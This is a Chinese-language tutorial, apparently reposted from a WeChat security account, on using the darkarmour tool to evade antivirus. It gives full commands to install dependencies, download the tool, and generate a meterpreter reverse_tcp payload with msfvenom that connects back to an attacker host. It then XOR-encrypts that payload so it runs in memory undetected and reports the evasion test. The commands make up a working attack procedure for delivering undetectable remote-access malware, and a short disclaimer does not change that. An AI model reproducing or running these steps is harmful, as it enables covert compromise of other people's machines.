darkarmour是一款基于Python的免杀工具。通过对shell加密,并在内存执行从而逃逸杀毒。通过本文一起来学习吧!
注意:本文仅供学习和研究,坚决反对一切危害网络安全的行为,造成法律后果自行负责。
安装依赖环境
在使用过程中可能遇到的唯一问题是二进制依赖项。所需的二进制文件是:i686-w64-mingw32-g++,i686-w64-mingw32-gcc和upx,我们可以通过apt命令进行安装。
sudo apt install mingw-w64-tools mingw-w64-common g++-mingw-w64 gcc-mingw-w64 upx-ucl osslsigncode
下载项目
wget https://github.com/bats3c/darkarmour/archive/refs/heads/master.zip
unzip master.zip
cd darkarmour-master
运行
python darkarmour.py
使用
我们首先先生成一个msf的shell。命令如下
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.123.74 LPORT=5555 -f exe -o kali.exe
然后执行命令
python3 darkarmour.py -f kali.exe -e xor -j -k snaker -l 10 -o kali2.exe
生成完后后效果
免杀测试
注意,以下结果可能随着病毒库的更新,在后面肯定会报毒的。只不过是时间的问题罢了。
更多精彩文章 欢迎关注我们
原文始发于微信公众号(kali黑客笔记):利用Darkarmour实现免杀
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论